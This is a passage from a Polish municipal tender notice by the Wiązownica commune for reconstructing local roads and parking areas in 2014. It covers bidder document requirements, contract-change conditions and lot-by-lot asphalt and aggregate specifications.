<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz oferty;
   - kosztorys ofertowy skrócony;
   - parafowany projekt umowy;
   - pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia;
   - pisemne zobowiązanie podmiotów oddających do  dyspozycji wykonawcy niezbędnych 
     zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany w umowie pod rygorem nieważności  muszą być dokonane w formie pisemnej.
2.	Zamawiający zgodnie z art. 144 ustawy Pzp. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:
    I. Zmiana terminu przewidzianego na rozpoczęcie lub zakończenie robót:
      1) zmiany spowodowane warunkami atmosferycznymi w szczególności:
          a) klęski żywiołowe, przez co rozumie się  zjawiska naturalne  związane z działaniem sił 
              natury, w szczególności wyładowania atmosferyczne, silne wiatry, intensywne opady 
              atmosferyczne, długotrwałe  upały,          
          b) warunki atmosferyczne odbiegające od typowych dla danego okresu, uniemożliwiające 
              prowadzenie robót budowlanych, przeprowadzenia prób i sprawdzeń, dokonywania 
              odbiorów, tj. długotrwałe  opady deszczu lub spadek temperatur powietrza  przez okres co 
              najmniej 5 dni, 
      2) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, 
          archeologicznymi lub terenowymi, w szczególności niewypały, niewybuchy, 
          wykopaliska archeologiczne:
      3) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne;
      4) odmienne  od przyjętych w dokumentacji projektowej warunki terenowe, w 
          szczególności istnienie nie zainwentaryzowanych lub błędnie zainwentaryzowanych 
          obiektów budowlanych;
      5) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w 
          szczególności:
         a) opóźnienie związane z przekazaniem  wykonawcy  terenu budowy oraz dokumentacji  
             budowlanej, 
         b) wstrzymania robót przez Zamawiającego,
         c) konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej 
             lub specyfikacji technicznej wykonania i odbioru robót,
         d) odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, 
            zezwoleń, uzgodnień z przyczyn niezawinionych przez wykonawcę, w tym odmowa 
            udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji.
     II. Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych 
         spowodowanych w szczególności następującymi okolicznościami:
1)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej, spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
2)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzeniu czasu realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy
3)	pojawienie się na rynku nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy,
4)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych / technologicznych niż wskazane w dokumentacji projektowej, w sytuacji gdy zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.
    III. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
2)	zmiana obowiązującej stawki VAT,
3)	zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
4)	Zmiany osób funkcyjnych, np. kierownika budowy, ze względu na zaistnienie nieprzewidzianych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  i www.bip-wiazownica.e-zet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica 208
pok. nr 42  II p. 
Cena dokumentacji przetargowej w wersji  papierowej 50 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica 208
Sekretariat Urzędu
pok. nr 22  I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi gminnej w Wiązownicy,  dz. nr ew. 1219, 1223 w km 
                                   0+000 - 0+182.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej w Wiązownicy,  dz. nr ew. 1219, 1223 w km 
                                   0+000 - 0+182
-	 mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	 wykonanie podbudowy z kruszywa łamanego 0/32, gr. warstwy 7 cm.
-	 wykonanie podbudowy z kruszywa łamanego 0/64 gr. warstwy 10 cm.
-	 wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	 uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	 uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Wiązownicy,  nr ew. dz.  965, 963
                                   w km. 0+000 - 0+261.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Wiązownicy,  nr ew. dz.  965, 963
                                   w km. 0+000 - 0+261
-	wykonanie podbudowy z kruszywa łamanego  0/32 gr. warstwy 5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRZEBUDOWA DROGI GMINNEJ w Wiązownica, dz. nr ewid. 1219, 1203	                       w km  0+000 ÷ 0+156.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA DROGI GMINNEJ w Wiązownica, dz. nr ewid. 1219, 1203	                       w km  0+000 ÷ 0+156 
-	wykonanie podbudowy z kruszywa łamanego  0/32 gr. warstwy 5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PRZEBUDOWA DROGI GMINNEJ w Szówsko, (boczna ul.  Parkowej),  
                                  w km 0+000 ÷ 0+091 dz. nr ewid. 723.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA DROGI GMINNEJ w Szówsko, (boczna ul.  Parkowej),  
                                  w km 0+000 ÷ 0+091 dz. nr ewid. 723
-	wykonanie podbudowy z kruszywa łamanego  0/32 gr. warstwy 7 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku, (boczna ul. Sanowej-Łącznik)              
                                   nr  ew. dz.  421.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku, (boczna ul. Sanowej-Łącznik)              
                                   nr  ew. dz.  421 
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy 10 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku - ul. Sanowa, nr ew. dz. 653
                                  w km 0+000 ÷0+653.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku - ul. Sanowa, nr ew. dz. 653
                                  w km 0+000 ÷0+653 
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy 10 cm. i 15 cm.
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość warstwy 7 cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku (za cmentarzem),  nr  ew. dz.  1016  w km. 0+000 - 0+168.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku (za cmentarzem),  nr  ew. dz.  1016  w km. 0+000 - 0+168 
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość warstwy  7 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w  Szówsku (Parking) w  nr ew. dz. 1019/1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w  Szówsku (Parking) w  nr ew. dz. 1019/1
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość 12 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku,   w  nr ew. dz. 957.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Szówsku,   w  nr ew. dz. 957 
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość warstwy  5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Ryszkowej Woli (teren szkoły),   w  nr ew. dz.  238/9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Ryszkowej Woli (teren szkoły),   w  nr ew. dz.  238/9 
-	regulacja pionowa studzienek kanalizacyjnych,
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy10 cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PRZEBUDOWA  DROGI  w Zapałowie (Parking).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI  w Zapałowie (Parking) 
-	wykonanie podbudowy z kruszywa łamanego 0/64  gr. warstwy 10 cm
-	Wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Zapałowie (Parking) w  nr ew. dz.  1217.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Zapałowie (Parking) w  nr ew. dz.  1217
-	regulacja pionowa studzienek kanalizacyjnych i technicznych,
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy10 cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Zapałowie (osiedle),  nr ew. dz. 1216/3
                       w km: 0+000 - 0+155.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Zapałowie (osiedle),  nr ew. dz. 1216/3
                       w km: 0+000 - 0+155 
-	mechaniczne oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni
-	skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Radawie (Kliszówka) 
                       w km. 0+000 - 0+380.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Radawie (Kliszówka) 
                       w km. 0+000 - 0+380 
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość   10 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Radawie (GOWIR)  nr ew. dz.  604, 605/2,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Radawie (GOWIR)  nr ew. dz.  604, 605/2, 
                       w km. 0+000 - 0+477 
-	wykonanie obrzeży betonowych na ławie oporowej
-	wykonanie koryta na poszerzeniach jezdni , głębokość 10 cm.
-	wykonanie podbudowy z kruszywa łamanego 0/32  grubość warstwy 10 cm.
-	oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni
-	skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2
-	wykonanie podbudowy z kruszywa łamanego 0/32  grubość warstwy 5 cm.
-	wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12 warstwa  gr.2cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Piwodzie,   nr  ewid.  dz. 965, 963
                       w km:  1+317 - 1+997.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Piwodzie,   nr  ewid.  dz. 965, 963
                       w km:  1+317 - 1+997
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość   5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Radawie,    nr  ew. dz.  153, 
                        w km. 0+000 - 0+360.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Radawie,    nr  ew. dz.  153, 
                        w km. 0+000 - 0+360  
-	mechaniczne profilowanie i zagęszczanie podłoża gruntu kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/63, grubość warstwy 10 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
